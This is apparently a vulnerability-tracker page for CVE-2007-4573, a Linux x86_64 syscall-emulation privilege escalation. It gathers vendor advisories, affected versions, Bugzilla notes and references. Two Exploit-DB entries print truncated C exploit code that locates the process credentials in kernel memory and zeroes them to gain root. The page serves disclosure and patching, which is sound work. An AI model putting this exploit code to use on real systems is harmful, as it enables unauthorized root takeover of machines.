CVE-2007-4573
Published 2007-09-24
Priority: P4 · CVSS 2.0: 7.2 (high) · Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 0.82% (52.6th percentile)
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| linux | linux_kernel | < 2.6.36 | 2.6.36 |
| linux | linux_kernel | <= 2.4.35 | — |
| linux | linux_kernel | <= 2.6.22.6 | — |
| linux | linux_kernel | — | — |
| suse | linux_enterprise_real_time_extension | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 7.2 | HIGH | — |
| vendor_ubuntu | — | 4.9 | MEDIUM | — |
Red Hat
kernel: IA32 System Call Entry Point Vulnerability
vendor_redhat·2010-09-15·CVSS 7.2
CVE-2010-3301 [HIGH] CWE-681 kernel: IA32 System Call Entry Point Vulnerability
The IA32 system call emulation functionality in arch/x86/ia32/ia32entry.S in the Linux kernel before 2.6.36-rc4-git2 on the x86_64 platform does not zero extend the %eax register after the 32-bit entry path to ptrace is used, which allows local users to gain privileges by triggering an out-of-bounds access to the system call table using the %rax register. NOTE: this vulnerability exists because of a CVE-2007-4573 regression.
Statement: This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 3, 4, 5, and Red Hat Enterprise MRG, as they do not contain the upstream commit d4d67150 that introduced this flaw.
More information can be found in this kbase: https://access.redhat.com/kb/docs/DOC-40330
Ubuntu
linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
vendor_ubuntu·2007-09-25·CVSS 4.9
CVE-2007-3731 [MEDIUM] linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Title: linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Summary: linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Evan Teran discovered that the Linux kernel ptrace routines did not correctly handle certain requests robustly. Local attackers could exploit this to crash the system, causing a denial of service. (CVE-2007-3731)

It was discovered that hugetlb kernels on PowerPC systems did not prevent the stack from colliding with reserved kernel memory. Local attackers could exploit this and crash the system, causing a denial of service. (CVE-2007-3739)

It was discovered that certain CIFS filesystem actions did not honor the umask of a process. Local attackers could exploit this to gain additional privileges. (CVE-2007-3740)
Wojci
Red Hat
x86_64 syscall vulnerability
vendor_redhat·2007-09-21·CVSS 7.2
CVE-2007-4573 [HIGH] x86_64 syscall vulnerability
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
Statement: This issue affected users who were running 64-bit versions of Red Hat Enterprise Linux 3, 4, or 5 on x86_64 architecture. It did not affect users of Red Hat Enterprise Linux 2.1.
GHSA
GHSA-79mw-6jhw-7997: The IA32 system call emulation functionality in arch/x86/ia32/ia32entry
ghsa_unreviewed·2022-05-13·CVSS 7.2
CVE-2010-3301 [HIGH] CWE-269 GHSA-79mw-6jhw-7997: The IA32 system call emulation functionality in arch/x86/ia32/ia32entry
The IA32 system call emulation functionality in arch/x86/ia32/ia32entry.S in the Linux kernel before 2.6.36-rc4-git2 on the x86_64 platform does not zero extend the %eax register after the 32-bit entry path to ptrace is used, which allows local users to gain privileges by triggering an out-of-bounds access to the system call table using the %rax register. NOTE: this vulnerability exists because of a CVE-2007-4573 regression.
GHSA
GHSA-jqfp-qwq6-6w3h: The IA32 system call emulation functionality in Linux kernel 2
ghsa_unreviewed·2022-05-01
CVE-2007-4573 [HIGH] GHSA-jqfp-qwq6-6w3h: The IA32 system call emulation functionality in Linux kernel 2
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
No detection rules found.
Exploit-DB
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
exploitdb·2007-09-27
CVE-2007-4573 Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
---
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski
*
* by
* Robert Swiecki
* Przemyslaw Frasunek
* Pawel Pisarczyk
* of ATM-Lab http://www.atm-lab.pl
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
ptr[0] = 0; //UID
ptr[1] = 0; //EUID
ptr[2] = 0; //SUID
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &eu
Exploit-DB
Linux Kernel 2.6.x - Ptrace Privilege Escalation
exploitdb·2007-09-21
CVE-2007-4573 Linux Kernel 2.6.x - Ptrace Privilege Escalation
---
/*
source: https://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski
*
* by
* Robert Swiecki
* Przemyslaw Frasunek
* Pawel Pisarczyk
* of ATM-Lab http://www.atm-lab.pl
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
as
Bugzilla
CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
bugzilla·2010-09-16·CVSS 7.2
CVE-2010-3301 [HIGH] CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
Description of problem:
CVE-2007-4573 regression
Reintroduced in v2.6.27-rc1 via commit d4d67150.
Upstream commits:
http://git.kernel.org/linus/36d001c70d8a0144ac1d038f6876c484849a74de
http://git.kernel.org/linus/eefdca043e8391dcd719711716492063030b55ac
References:
http://sota.gen.nz/compat2/
Acknowledgements:
Red Hat would like to thank Ben Hawkes for reporting this issue.
Discussion:
Statement:
This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 3, 4, 5, and Red Hat Enterprise MRG, as they do not contain the upstream commit d4d67150 that introduced this flaw.
More information can be found in this kbase: https://access.redhat.com/kb/docs/DOC-40330
---
Public exploit: ht
Bugzilla
CVE-2007-4573 x86_64 syscall vulnerability
bugzilla·2007-09-18·CVSS 7.2
CVE-2007-4573 [HIGH] CVE-2007-4573 x86_64 syscall vulnerability
Wojciech Purczynski of COSEINC notified us of a kernel security issue that could lead to local privilege escalation on x86_64 platforms. Draft advisory to follow.
Acknowledgements:
Red Hat would like to thank Wojciech Purczynski for reporting this issue.
Discussion:
Note that for RHEL5 this fix probably also needs to be applied to ia32entry-xen.S created by linux-2.6-xen.patch
---
Fix has been committed upstream (public)
---
URL of the fix:
http://git.kernel.org/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=176df2457ef6207156ca1a40991c54ca01fef567
---
public, removing embargo
---
Details of privilege escalation consequence now public via advisory:
http://marc.info/?l=full-disclosure&m=119062587407908&w=2
(opening up
References:
http://fedoranews.org/updates/FEDORA-2007-229.shtml
http://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.35.3
http://lists.opensuse.org/opensuse-security-announce/2007-12/msg00001.html
http://lkml.org/lkml/2007/9/21/512
http://lkml.org/lkml/2007/9/21/513
http://marc.info/?l=full-disclosure&m=119062587407908&w=2
http://secunia.com/advisories/26917
http://secunia.com/advisories/26919
http://secunia.com/advisories/26934
http://secunia.com/advisories/26953
http://secunia.com/advisories/26955
http://secunia.com/advisories/26978
http://secunia.com/advisories/26994
http://secunia.com/advisories/26995
http://secunia.com/advisories/27212
http://secunia.com/advisories/27227
http://secunia.com/advisories/27912
http://secunia.com/advisories/29058
http://securitytracker.com/id?1018748
http://www.debian.org/security/2007/dsa-1378
http://www.debian.org/security/2007/dsa-1381
http://www.debian.org/security/2008/dsa-1504
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.7
http://www.mandriva.com/security/advisories?name=MDKSA-2007:195
http://www.mandriva.com/security/advisories?name=MDKSA-2007:196
http://www.mandriva.com/security/advisories?name=MDVSA-2008:008
http://www.mandriva.com/security/advisories?name=MDVSA-2008:105
http://www.novell.com/linux/security/advisories/2007_53_kernel.html
http://www.redhat.com/support/errata/RHSA-2007-0936.html
http://www.redhat.com/support/errata/RHSA-2007-0937.html
http://www.redhat.com/support/errata/RHSA-2007-0938.html
http://www.securityfocus.com/archive/1/480451/100/0/threaded
http://www.securityfocus.com/archive/1/480705/100/0/threaded
http://www.securityfocus.com/bid/25774
http://www.ubuntu.com/usn/usn-518-1
http://www.vupen.com/english/advisories/2007/3246
https://issues.rpath.com/browse/RPL-1754
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9735
https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00355.html